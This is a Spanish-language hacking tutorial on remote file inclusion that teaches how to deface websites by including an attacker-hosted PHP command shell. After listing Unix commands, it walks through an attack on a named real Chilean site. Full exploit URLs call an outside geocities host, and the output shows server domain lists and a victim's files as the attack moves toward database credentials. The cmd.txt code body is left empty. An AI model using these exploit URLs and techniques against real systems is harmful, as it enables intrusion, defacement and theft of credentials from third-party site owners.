autor = cyberalexis (
[email protected] ) website = http://www.cyberalexis.net =============================================================================== el ceviche y el pisco son peruanos y nadie podra comparar ni igualar su calidad =============================================================================== ������������������������������ remote file inclucion (rfi) ������������������������������ este texto explica como se puede defacear un website mediante la tecnica remote file inclucion bajo mi concepto. cualquier duda, queja, sugerencia, agradecimiento etc enviame un e-mail. recuerda que este texto es con fines informaticos ( educativos ) no me hago responsable del uso bueno o malo que puedas dar con la informacion obtenida. (poco floro). - que es remote file inclucion? vulnerabilidad por la cual puedes incluir archivos remotos. donde se encuentra la vulnerabilidad? generalmente esta se encuentra en los codigos como : include"$page"; ?>
---> esto me permite incluir un archivo.
- incluyendo archivo con funcion system ya que puedo incluir cualquier archivo creare un codigo con la funcion system. esta funcion me permite ejecutar comandos en el sistema. --------------cmd.txt -------------- ------------------------------------- bien como uso esto? imaginemos que la web es http://webvulnerable.com/index.php?page=archivo-aincluir lo que haremos sera incluir nuestro codigo (cmd.txt),lo guardaremos con extencion txt,gif,jpg,dat para que se ejecute en la website vulnerable, ya que si lo guardamos con extencion php se ejecutara en nuestro servidor.una ves guardado
nuestro codigo lo subimos a nuestro webserver (cuenta host, website). seria algo asi : http://webvulnerable.com/index.php?page=http://miweb.com/cmd.txt?&cmd=comando-unix con esto podremos ejecutar comandos en el sistema. pero para nuestra comodidad existen ejecutores de comandos conocidos como phpshells estos son mas faciles de usar porque tienes una caja de texto, solo tienes que escribir el comando a ejecutar y listo, o tambien se usan asi: http://webvulnerable.com/index.php?page=http://miweb.com/miphpshell.txt?&cmd=coman do-unix hasta aca sabemos incluir un phpshell, pero que comandos utilizamos?? comandos basicos unix --------------------ls = lista archivos y subdirectorios en un directorio. ---> ls+/directorio/ cat = permite ver el sourcecode. ---> cat /archivo.php cd = comando que permite cambiarnos de directorio ( entrar a un directorio ). ---> cd /directorio/ pwd = este te muestra la ruta donde te encuentras. ---> pwd rm = este permite eliminar un archivo o directorio. ---> rm archivo mv = con este puedes renombrar un archivo. ---> mv arhivo.php archivorenombrado.php wget = permite subir archivos. ---> wget tuweb.com/archivo chmod = cambia los permisos de un archivo ---> chmod (opcion) archivo opciones: u: g: o: +: -: r: w: x: 0: 1: 2: 3: 4: 5: 6: 7:
proprietario del archivo grupo de proprietarios otros usuarios a�ade uno o m�s permisos saca uno o m�s permisos permiso de lectura permiso de escritura permiso de ejecuci�n sin permiso permiso de ejecuci�n permiso de escritura permiso de escritura y ejecuci�n permiso solo de lectura permiso de lectura y ejecuci�n permiso de lectura y escritura acceso completo
. = ejecuta un archivo ---> ./archivo find = permite buscar archivos o directorios. ---> find [ruta] [opciones] o find / -name archivo gcc = este permite compilar. ---> gcc exploit.c �o exploit bien ahora que conocemos los comandos, comenzaremos a trabajar :d. - caso real. aca tengo una web que se puede hacer rfi ( remote file inclucion ) la
utilizare para hacer un ejemplo real. website = http://www.clinamen.cl/contactoemail/ (para mala suerte la web es chilena xd, ahhhhhhhhh recuerden el pisco es peruano) este es un bug en form mail script, esto es un formulario de contacto. el bug es una inclusion.. ... /***************************************************** ** include functions *****************************************************/ include $script_root . 'inc/functions.inc.php'; include $script_root . 'inc/template.class.inc.php'; include $script_root . 'inc/template.ext.class.inc.php'; include $script_root . 'inc/formmail.class.inc.php'; ... include $script_root . 'languages/language.' . $language . '.inc.php'; ... lo cual se explotaria: http://[victim]/[dir]/inc/formmail.inc.php?script_root=http://tuweb.com/cmd.txt?&c md=comando bien ahora que tenemos incluida nuestra phpshell en la webvulnerable se pueden hacer muchas cosas como rootear el servidor pero en este caso nos centraremos al rfi. lo primero que haremos sera listar todos los subdominios del server. http://www.clinamen.cl/contactoemail/inc/formmail.inc.php?script_root=http://es.ge ocities.com/baby_trony/ imtra.txt?&cmd=head%20-1000%20/etc/userdomains --------------------------------------axionweb.cl: axionweb axnsport.cl: axnsport bancosabusos.cl: bancos bcga.cl: bcga betancur.cl: imprenta biocheck.cl: biocheck blawi.cl: blawicl bolchevique.com: bolchevi ... --------------------------------------ahora buscaremos su conexion con la base de datos claro si es que tiene.en este caso sera de la web www.bancosabusos.cl y su user= bancos puede ser de cualquiera de las webs que estan dentro del servidor primero listamos sus archivos: http://www.clinamen.cl/contactoemail/inc/formmail.inc.php?script_root=http://es.ge ocities.com/baby_trony/ imtra.txt?&cmd=cd /home/bancos/public_html/;ls
--------------------------------------abusos.php admin articulos.php casos.php cgi-bin conec.php contacto.php estilo.css ... --------------------------------------su conexion con la base de datos se encuentra en el archivo conec.php, bien veremos su sourcecode. http://www.clinamen.cl/contactoemail//inc/formmail.inc.php?script_root=http://es.g eocities.com/baby_trony/ imtra.txt?&cmd=cd /home/bancos/public_html;cat conec.php -------------------------------------------------------------------